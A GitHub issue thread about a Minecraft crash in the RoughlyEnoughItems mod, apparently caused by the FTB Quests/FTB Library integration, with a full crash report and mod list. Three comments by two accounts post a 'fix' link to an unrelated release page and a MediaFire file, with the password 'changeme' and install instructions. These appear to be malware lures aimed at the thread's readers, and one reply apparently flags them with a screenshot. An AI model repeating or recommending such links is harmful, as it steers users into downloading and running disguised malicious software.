### ISSUE TITLE
[Bug] Crash with FTB Quests "java.lang.IllegalStateException: BufferBuilder was empty"

### ISSUE THREAD

**Issue by Flamaghl** [shedaniel/RoughlyEnoughItems#1718]
### What happened?

When trying to join or create a new world, the game crashes

It is pointing at REI and Ftb quests, but I am unsure which is at fault

### What mod loaders are you seeing the problem on?

Fabric

### What do you think this bug is of?

- [ ] Visual
- [ ] Recipe Lookup
- [ ] Cheat Mode
- [X] Plugin Integration / JEI Plugin Compatibility
- [ ] Others

### Relevant log output

```shell
---- Minecraft Crash Report ----
// My bad.

Description: Rendering entry

java.lang.IllegalStateException: BufferBuilder was empty
	at MC//net.minecraft.client.render.BufferBuilder.end(BufferBuilder.java:69)
	at dev.ftb.mods.ftblibrary.ui.GuiHelper.drawTexturedRect(GuiHelper.java:84)
	at dev.ftb.mods.ftblibrary.icon.ImageIcon.draw(ImageIcon.java:79)
	at dev.ftb.mods.ftblibrary.integration.REIIntegration$SidebarButtonEntry$1.render(REIIntegration.java:150)
	at me.shedaniel.rei.impl.client.entry.type.types.RenderingEntryDefinition$DeferredRenderer.render(RenderingEntryDefinition.java:83)
	at me.shedaniel.rei.impl.common.entry.AbstractEntryStack.render(AbstractEntryStack.java:184)
	at me.shedaniel.rei.impl.client.gui.widget.EntryWidget.drawCurrentEntry(EntryWidget.java:437)
	at me.shedaniel.rei.impl.client.gui.widget.EntryWidget.render(EntryWidget.java:388)
	at me.shedaniel.rei.impl.client.gui.widget.region.RegionEntryWidget.render(RegionEntryWidget.java:84)
	at me.shedaniel.rei.impl.client.gui.widget.BatchedEntryRendererManager.renderSlow(BatchedEntryRendererManager.java:258)
	at me.shedaniel.rei.impl.client.gui.widget.BatchedEntryRendererManager.render(BatchedEntryRendererManager.java:145)
	at me.shedaniel.rei.impl.client.gui.widget.BatchedEntryRendererManager.render(BatchedEntryRendererManager.java:119)
	at me.shedaniel.rei.impl.client.gui.widget.region.EntryStacksRegionWidget.render(EntryStacksRegionWidget.java:135)
	at me.shedaniel.rei.impl.client.gui.widget.favorites.FavoritesListWidget.render(FavoritesListWidget.java:214)
	at me.shedaniel.rei.impl.client.gui.ScreenOverlayImpl.renderWidgets(ScreenOverlayImpl.java:347)
	at me.shedaniel.rei.impl.client.gui.ScreenOverlayImpl.render(ScreenOverlayImpl.java:244)
	at me.shedaniel.rei.impl.client.registry.screen.ScreenRegistryImpl$5.render(ScreenRegistryImpl.java:375)
	at me.shedaniel.rei.impl.client.registry.screen.DefaultScreenOverlayRenderer.lambda$onApplied$5(DefaultScreenOverlayRenderer.java:91)
	at me.shedaniel.rei.impl.client.registry.screen.DefaultScreenOverlayRenderer.lambda$new$1(DefaultScreenOverlayRenderer.java:61)
	at MC//net.minecraft.client.gui.screen.ingame.HandledScreen.handler$zdc000$architectury$renderBackground(HandledScreen.java:1232)
	at MC//net.minecraft.client.gui.screen.ingame.HandledScreen.renderBackground(HandledScreen.java:172)
	at MC//net.minecraft.client.gui.screen.Screen.render(Screen.java:126)
	at MC//net.minecraft.client.gui.screen.ingame.HandledScreen.render(HandledScreen.java:100)
	at MC//net.minecraft.client.gui.screen.ingame.AbstractInventoryScreen.render(AbstractInventoryScreen.java:32)
	at MC//net.minecraft.client.gui.screen.ingame.CreativeInventoryScreen.render(CreativeInventoryScreen.java:778)
	at MC//net.minecraft.client.gui.screen.Screen.renderWithTooltip(Screen.java:117)
	at MC//net.minecraft.client.render.GameRenderer.mixinextras$bridge$method_47413$255(GameRenderer.java)
	at MC//net.minecraft.client.render.GameRenderer.wrapOperation$cjf000$fabric-screen-api-v1$onRenderScreen(GameRenderer.java:3086)
	at MC//net.minecraft.client.render.GameRenderer.mixinextras$bridge$wrapOperation$cjf000$fabric-screen-api-v1$onRenderScreen$257(GameRenderer.java)
	at MC//net.minecraft.client.render.GameRenderer.wrapOperation$eoe000$optigui$renderCurrentScreenWithTooltip(GameRenderer.java:7114)
	at MC//net.minecraft.client.render.GameRenderer.render(GameRenderer.java:913)
	at MC//net.minecraft.client.MinecraftClient.render(MinecraftClient.java:1285)
	at MC//net.minecraft.client.MinecraftClient.run(MinecraftClient.java:882)
	at net.minecraft.client.main.Main.main(Main.java:256)
	at app//net.fabricmc.loader.impl.game.minecraft.MinecraftGameProvider.launch(MinecraftGameProvider.java:480)
	at app//net.fabricmc.loader.impl.launch.knot.Knot.launch(Knot.java:74)
	at app//net.fabricmc.loader.impl.launch.knot.KnotClient.main(KnotClient.java:23)


A detailed walkthrough of the error, its code path and all known details is as follows:
---------------------------------------------------------------------------------------

-- Head --
Thread: Render thread
Stacktrace:
	at MC//net.minecraft.client.render.BufferBuilder.end(BufferBuilder.java:69)
	at dev.ftb.mods.ftblibrary.ui.GuiHelper.drawTexturedRect(GuiHelper.java:84)
	at dev.ftb.mods.ftblibrary.icon.ImageIcon.draw(ImageIcon.java:79)

-- Screen details --
Details:
	Screen name: net.minecraft.class_481
Stacktrace:
	at me.shedaniel.rei.impl.client.util.CrashReportUtils.screen(CrashReportUtils.java:50)
	at me.shedaniel.rei.impl.client.util.CrashReportUtils.essential(CrashReportUtils.java:44)
	at me.shedaniel.rei.impl.common.entry.AbstractEntryStack.render(AbstractEntryStack.java:186)
	at me.shedaniel.rei.impl.client.gui.widget.EntryWidget.drawCurrentEntry(EntryWidget.java:437)
	at me.shedaniel.rei.impl.client.gui.widget.EntryWidget.render(EntryWidget.java:388)
	at me.shedaniel.rei.impl.client.gui.widget.region.RegionEntryWidget.render(RegionEntryWidget.java:84)
	at me.shedaniel.rei.impl.client.gui.widget.BatchedEntryRendererManager.renderSlow(BatchedEntryRendererManager.java:258)
	at me.shedaniel.rei.impl.client.gui.widget.BatchedEntryRendererManager.render(BatchedEntryRendererManager.java:145)
	at me.shedaniel.rei.impl.client.gui.widget.BatchedEntryRendererManager.render(BatchedEntryRendererManager.java:119)
	at me.shedaniel.rei.impl.client.gui.widget.region.EntryStacksRegionWidget.render(EntryStacksRegionWidget.java:135)
	at me.shedaniel.rei.impl.client.gui.widget.favorites.FavoritesListWidget.render(FavoritesListWidget.java:214)
	at me.shedaniel.rei.impl.client.gui.ScreenOverlayImpl.renderWidgets(ScreenOverlayImpl.java:347)
	at me.shedaniel.rei.impl.client.gui.ScreenOverlayImpl.render(ScreenOverlayImpl.java:244)
	at me.shedaniel.rei.impl.client.registry.screen.ScreenRegistryImpl$5.render(ScreenRegistryImpl.java:375)
	at me.shedaniel.rei.impl.client.registry.screen.DefaultScreenOverlayRenderer.lambda$onApplied$5(DefaultScreenOverlayRenderer.java:91)
	at me.shedaniel.rei.impl.client.registry.screen.DefaultScreenOverlayRenderer.lambda$new$1(DefaultScreenOverlayRenderer.java:61)
	at MC//net.minecraft.client.gui.screen.ingame.HandledScreen.handler$zdc000$architectury$renderBackground(HandledScreen.java:1232)
	at MC//net.minecraft.client.gui.screen.ingame.HandledScreen.renderBackground(HandledScreen.java:172)
	at MC//net.minecraft.client.gui.screen.Screen.render(Screen.java:126)
	at MC//net.minecraft.client.gui.screen.ingame.HandledScreen.render(HandledScreen.java:100)
	at MC//net.minecraft.client.gui.screen.ingame.AbstractInventoryScreen.render(AbstractInventoryScreen.java:32)
	at MC//net.minecraft.client.gui.screen.ingame.CreativeInventoryScreen.render(CreativeInventoryScreen.java:778)
	at MC//net.minecraft.client.gui.screen.Screen.renderWithTooltip(Screen.java:117)
	at MC//net.minecraft.client.render.GameRenderer.mixinextras$bridge$method_47413$255(GameRenderer.java)
	at MC//net.minecraft.client.render.GameRenderer.wrapOperation$cjf000$fabric-screen-api-v1$onRenderScreen(GameRenderer.java:3086)
	at MC//net.minecraft.client.render.GameRenderer.mixinextras$bridge$wrapOperation$cjf000$fabric-screen-api-v1$onRenderScreen$257(GameRenderer.java)
	at MC//net.minecraft.client.render.GameRenderer.wrapOperation$eoe000$optigui$renderCurrentScreenWithTooltip(GameRenderer.java:7114)
	at MC//net.minecraft.client.render.GameRenderer.render(GameRenderer.java:913)
	at MC//net.minecraft.client.MinecraftClient.render(MinecraftClient.java:1285)
	at MC//net.minecraft.client.MinecraftClient.run(MinecraftClient.java:882)
	at net.minecraft.client.main.Main.main(Main.java:256)
	at app//net.fabricmc.loader.impl.game.minecraft.MinecraftGameProvider.launch(MinecraftGameProvider.java:480)
	at app//net.fabricmc.loader.impl.launch.knot.Knot.launch(Knot.java:74)
	at app//net.fabricmc.loader.impl.launch.knot.KnotClient.main(KnotClient.java:23)

-- Renderer details --
Details:
	Renderer name: me.shedaniel.rei.impl.common.entry.TypedEntryStack
	Entry type: minecraft:rendering
	Is empty: false
	Entry identifier: null

-- Entry Renderer --
Details:
	Entry definition class name: ~~NULL~~

-- Screen details --
Details:
	Screen name: net.minecraft.class_481

-- Renderer details --
Details:
	Renderer name: me.shedaniel.rei.impl.client.gui.widget.region.RegionEntryWidget
	Bounds: me.shedaniel.math.Rectangle@61fcb492[height=2,width=2,x=2,y=8]
	Notice mark: 0
	Interactable: true
	Interactable favorites: true
	Highlight enabled: true
	Tooltip enabled: true
	Background enabled: false
	Entries count: 1

-- Current Rendering Entry --
Details:
	Renderer name: me.shedaniel.rei.impl.common.entry.TypedEntryStack
	Entry type: minecraft:rendering
	Is empty: false
	Entry identifier: null

-- Entry Renderer --
Details:
	Entry definition class name: ~~NULL~~

-- Screen details --
Details:
	Screen name: net.minecraft.class_481

-- System Details --
Details:
	Minecraft Version: 1.21
	Minecraft Version ID: 1.21
	Operating System: Windows 11 (amd64) version 10.0
	Java Version: 21.0.3, Microsoft
	Java VM Version: OpenJDK 64-Bit Server VM (mixed mode), Microsoft
	Memory: 364729912 bytes (347 MiB) / 2147483648 bytes (2048 MiB) up to 10536091648 bytes (10048 MiB)
	CPUs: 32
	Processor Vendor: AuthenticAMD
	Processor Name: AMD Ryzen 9 7945HX with Radeon Graphics        
	Identifier: AuthenticAMD Family 25 Model 97 Stepping 2
	Microarchitecture: Zen 3
	Frequency (GHz): 2.50
	Number of physical packages: 1
	Number of physical CPUs: 16
	Number of logical CPUs: 32
	Graphics card #0 name: AMD Radeon(TM) 610M
	Graphics card #0 vendor: Advanced Micro Devices, Inc.
	Graphics card #0 VRAM (MiB): 512.00
	Graphics card #0 deviceId: VideoController1
	Graphics card #0 versionInfo: 31.0.14038.8002
	Graphics card #1 name: NVIDIA GeForce RTX 4080 Laptop GPU
	Graphics card #1 vendor: NVIDIA
	Graphics card #1 VRAM (MiB): 12282.00
	Graphics card #1 deviceId: VideoController2
	Graphics card #1 versionInfo: 32.0.15.6094
	Memory slot #0 capacity (MiB): 16384.00
	Memory slot #0 clockSpeed (GHz): 4.80
	Memory slot #0 type: Unknown
	Memory slot #1 capacity (MiB): 16384.00
	Memory slot #1 clockSpeed (GHz): 4.80
	Memory slot #1 type: Unknown
	Virtual memory max (MiB): 36570.07
	Virtual memory used (MiB): 14826.21
	Swap memory total (MiB): 4608.00
	Swap memory used (MiB): 0.00
	Space in storage for jna.tmpdir (MiB): available: 1379508.63, total: 1927600.38
	Space in storage for org.lwjgl.system.SharedLibraryExtractPath (MiB): available: 1379508.63, total: 1927600.38
	Space in storage for io.netty.native.workdir (MiB): available: 1379508.63, total: 1927600.38
	Space in storage for java.io.tmpdir (MiB): available: 1379508.63, total: 1927600.38
	Space in storage for workdir (MiB): available: 1379508.63, total: 1927600.38
	JVM Flags: 4 total; -XX:HeapDumpPath=MojangTricksIntelDriversForPerformance_javaw.exe_minecraft.exe.heapdump -Xss1M -Xmx10048m -Xms256m
	Fabric Mods: 
		achiopt: AchievementOptimizer 1.21-1.1.0
		alternate-current: Alternate Current 1.9.0
		ambientsounds: AmbientSounds 6.0.5
		animatica: Animatica 0.6.1+1.21
		appleskin: AppleSkin 3.0.5+mc1.21
		architectury: Architectury 13.0.6
		autoclicker-fabric: Auto Clicker 21.0.3
		autorun: AutoRun 0.6.0
		azurelibarmor: AzureLib Armor 2.3.2
		badoptimizations: BadOptimizations 2.1.4
		badpackets: Bad Packets 0.8.1
		balancedrecall: Balanced Recall 1.0.6
		balm-fabric: Balm 21.0.18
			kuma_api: KumaAPI 21.0.5-SNAPSHOT
		betteradvancements: Better Advancements 0.4.2.16
		betterf3: BetterF3 11.0.1
		bettermounthud: Better Mount HUD 1.2.4
		biolith: Biolith 3.0.0
		biomemusic: Biome Music Mod 1.21-2.5
		biomeparticleweather: BiomeParticleWeather 5.2.4
		brrp_v1: Better Runtime Resource Pack (BRRP) v1 1.0.4
		cardinal-components: Cardinal Components API 6.1.1
			cardinal-components-base: Cardinal Components API (base) 6.1.1
			cardinal-components-block: Cardinal Components API (blocks) 6.1.1
			cardinal-components-chunk: Cardinal Components API (chunks) 6.1.1
			cardinal-components-entity: Cardinal Components API (entities) 6.1.1
			cardinal-components-item: Cardinal Components API (items) 6.1.1
			cardinal-components-level: Cardinal Components API (world saves) 6.1.1
			cardinal-components-scoreboard: Cardinal Components API (scoreboard) 6.1.1
			cardinal-components-world: Cardinal Components API (worlds) 6.1.1
		cavedust: Cave Dust 3.0.0
			kirin: Kirin UI 1.19.0+1.21
		cavernous: Fantastic Biomes Cave 2.1.3
		cinderscapes: Cinderscapes 5.0.1
			cinderscapes-client: Cinderscapes: Client 5.0.1
			cinderscapes-common: Cinderscapes: Common 5.0.1
			cinderscapes-worldgen: Cinderscapes: World Generation 5.0.1
			terraform-biome-remapper-api-v1: Terraform Biome Remapper API (v1) 11.0.0-alpha.1
			terraform-shapes-api-v1: Terraform Shapes API (v1) 11.0.0-alpha.1
			terraform-surfaces-api-v1: Terraform Surfaces API (v1) 11.0.0-alpha.1
			terraform-wood-api-v1: Terraform Wood API (v1) 11.0.0-alpha.1
		clean_tooltips: Clean Tooltips 1.0
		clickadv: Clickable Advancements Mod 1.21-3.8
		cloth-config: Cloth Config v15 15.0.130
			cloth-basic-math: cloth-basic-math 0.6.1
		clumps: Clumps 18.0.0.2
		collective: Collective 7.84
		connectivity: Connectivity Mod 1.21-5.7
		continuity: Continuity 3.0.0-beta.5+1.21
		controlling: Controlling 18.0.4
		copperhopper: Copper Hopper 0.9.3+1.21
		creativecore: CreativeCore 2.12.9
			net_neoforged_bus: bus 7.2.0
		cupboard: cupboard 1.21-2.7
		darkenchanting: Dark Enchanting 1.3.0+1.21
			omegaconfig: Omega Config Architectury 1.5.1
		debugify: Debugify 1.21+1.0
		discerning_furnace: Discerning Furnace 1.1.0
		echochest: Echo Chest 21.0.0
		elytratrims: Elytra Trims 3.4.4
			conditional-mixin: conditional mixin 0.6.2
			mixinsquared: MixinSquared 0.1.2-beta.4
		elytratrims_extensions: Elytra Trims Extensions 2.2.1
		endorium: Endorium 1.1.5
		enhancedblockentities: Enhanced Block Entities 0.10.1+1.21
		entity_model_features: Entity Model Features 2.2
		entity_sound_features: Entity Sound Features 0.4
		entity_texture_features: Entity Texture Features 6.2.2
			org_apache_httpcomponents_httpmime: httpmime 4.5.10
		entityculling: EntityCulling 1.7.0
		equipmentcompare: Equipment Compare 1.3.12
		explorerscompass: Explorer's Compass 1.21-2.2.5-fabric
		fabric-api: Fabric API 0.102.0+1.21
			fabric-api-base: Fabric API Base 0.4.42+6573ed8cd1
			fabric-api-lookup-api-v1: Fabric API Lookup API (v1) 1.6.68+b5597344d1
			fabric-biome-api-v1: Fabric Biome API (v1) 13.0.29+5bd9f1bcd1
			fabric-block-api-v1: Fabric Block API (v1) 1.0.22+0af3f5a7d1
			fabric-block-view-api-v2: Fabric BlockView API (v2) 1.0.10+6573ed8cd1
			fabric-blockrenderlayer-v1: Fabric BlockRenderLayer Registration (v1) 1.1.52+0af3f5a7d1
			fabric-client-tags-api-v1: Fabric Client Tags 1.1.15+6573ed8cd1
			fabric-command-api-v1: Fabric Command API (v1) 1.2.49+f71b366fd1
			fabric-command-api-v2: Fabric Command API (v2) 2.2.28+6ced4dd9d1
			fabric-commands-v0: Fabric Commands (v0) 0.2.66+df3654b3d1
			fabric-content-registries-v0: Fabric Content Registries (v0) 8.0.16+b5597344d1
			fabric-convention-tags-v1: Fabric Convention Tags 2.0.19+7f945d5bd1
			fabric-convention-tags-v2: Fabric Convention Tags (v2) 2.5.0+c5e2b5c6d1
			fabric-crash-report-info-v1: Fabric Crash Report Info (v1) 0.2.29+0af3f5a7d1
			fabric-data-attachment-api-v1: Fabric Data Attachment API (v1) 1.1.27+6a6dfa19d1
			fabric-data-generation-api-v1: Fabric Data Generation API (v1) 20.2.16+16c4ae25d1
			fabric-dimensions-v1: Fabric Dimensions API (v1) 4.0.0+6fc22b99d1
			fabric-entity-events-v1: Fabric Entity Events (v1) 1.6.12+6fc22b99d1
			fabric-events-interaction-v0: Fabric Events Interaction (v0) 0.7.12+ba9dae06d1
			fabric-game-rule-api-v1: Fabric Game Rule API (v1) 1.0.53+6ced4dd9d1
			fabric-item-api-v1: Fabric Item API (v1) 11.0.0+afdfc921d1
			fabric-item-group-api-v1: Fabric Item Group API (v1) 4.1.4+78017270d1
			fabric-key-binding-api-v1: Fabric Key Binding API (v1) 1.0.47+0af3f5a7d1
			fabric-keybindings-v0: Fabric Key Bindings (v0) 0.2.45+df3654b3d1
			fabric-lifecycle-events-v1: Fabric Lifecycle Events (v1) 2.3.12+6c1df360d1
			fabric-loot-api-v2: Fabric Loot API (v2) 3.0.14+3f89f5a5d1
			fabric-loot-api-v3: Fabric Loot API (v3) 1.0.2+3f89f5a5d1
			fabric-message-api-v1: Fabric Message API (v1) 6.0.13+6573ed8cd1
			fabric-model-loading-api-v1: Fabric Model Loading API (v1) 2.0.0+fe474d6bd1
			fabric-networking-api-v1: Fabric Networking API (v1) 4.2.2+60c3209bd1
			fabric-object-builder-api-v1: Fabric Object Builder API (v1) 15.2.0+a551f7a4d1
			fabric-particles-v1: Fabric Particles (v1) 4.0.2+6573ed8cd1
			fabric-recipe-api-v1: Fabric Recipe API (v1) 5.0.12+65089712d1
			fabric-registry-sync-v0: Fabric Registry Sync (v0) 5.1.2+60c3209bd1
			fabric-renderer-api-v1: Fabric Renderer API (v1) 3.4.0+c705a49cd1
			fabric-renderer-indigo: Fabric Renderer - Indigo 1.7.0+c705a49cd1
			fabric-renderer-registries-v1: Fabric Renderer Registries (v1) 3.2.68+df3654b3d1
			fabric-rendering-data-attachment-v1: Fabric Rendering Data Attachment (v1) 0.3.48+73761d2ed1
			fabric-rendering-fluids-v1: Fabric Rendering Fluids (v1) 3.1.6+b5597344d1
			fabric-rendering-v0: Fabric Rendering (v0) 1.1.71+df3654b3d1
			fabric-rendering-v1: Fabric Rendering (v1) 5.0.5+df16efd0d1
			fabric-resource-conditions-api-v1: Fabric Resource Conditions API (v1) 4.3.0+8dc279b1d1
			fabric-resource-loader-v0: Fabric Resource Loader (v0) 1.3.0+56599129d1
			fabric-screen-api-v1: Fabric Screen API (v1) 2.0.24+b5597344d1
			fabric-screen-handler-api-v1: Fabric Screen Handler API (v1) 1.3.86+b5597344d1
			fabric-sound-api-v1: Fabric Sound API (v1) 1.0.23+6573ed8cd1
			fabric-transfer-api-v1: Fabric Transfer API (v1) 5.1.16+3dccd343d1
			fabric-transitive-access-wideners-v1: Fabric Transitive Access Wideners (v1) 6.1.0+176f9036d1
		fabric-language-kotlin: Fabric Language Kotlin 1.12.1+kotlin.2.0.20
			org_jetbrains_kotlin_kotlin-reflect: kotlin-reflect 2.0.20
			org_jetbrains_kotlin_kotlin-stdlib: kotlin-stdlib 2.0.20
			org_jetbrains_kotlin_kotlin-stdlib-jdk7: kotlin-stdlib-jdk7 2.0.20
			org_jetbrains_kotlin_kotlin-stdlib-jdk8: kotlin-stdlib-jdk8 2.0.20
			org_jetbrains_kotlinx_atomicfu-jvm: atomicfu-jvm 0.25.0
			org_jetbrains_kotlinx_kotlinx-coroutines-core-jvm: kotlinx-coroutines-core-jvm 1.8.1
			org_jetbrains_kotlinx_kotlinx-coroutines-jdk8: kotlinx-coroutines-jdk8 1.8.1
			org_jetbrains_kotlinx_kotlinx-datetime-jvm: kotlinx-datetime-jvm 0.6.1
			org_jetbrains_kotlinx_kotlinx-io-bytestring-jvm: kotlinx-io-bytestring-jvm 0.5.3
			org_jetbrains_kotlinx_kotlinx-io-core-jvm: kotlinx-io-core-jvm 0.5.3
			org_jetbrains_kotlinx_kotlinx-serialization-cbor-jvm: kotlinx-serialization-cbor-jvm 1.7.1
			org_jetbrains_kotlinx_kotlinx-serialization-core-jvm: kotlinx-serialization-core-jvm 1.7.1
			org_jetbrains_kotlinx_kotlinx-serialization-json-jvm: kotlinx-serialization-json-jvm 1.7.1
```

### Anything else?

I am on Fabric 1.21, Modloader 0.16.2
Fabric API is ver 0.102.0+1.21
FTB quests is ver fabric-2100.1.4
REI is ver 16.0.754-fabric

Crash report :
[crash-2024-08-28_22.32.27-client.txt](https://github.com/user-attachments/files/16788687/crash-2024-08-28_22.32.27-client.txt)
Log :
[latest.log](https://github.com/user-attachments/files/16788689/latest.log)

### By submitting this issue, I have included the necessary logs by pasting the contents into the correct location or attaching the file as an upload.

- [X] Yes, and I did not use any paste services other than GitHub Gists.

### By submitting this issue, I have confirmed my REI and REI's dependencies are up to date.

- [X] Yes

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rozbrajaczpoziomow** [comment]
> hi bro, to fix your trouble try this fix, i see it in another issue, https://app.mediafire.com/removed

![Screenshot_20240831-084040_1](https://github.com/user-attachments/assets/a24de824-d623-4b2f-a187-f7a1c03fc486)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
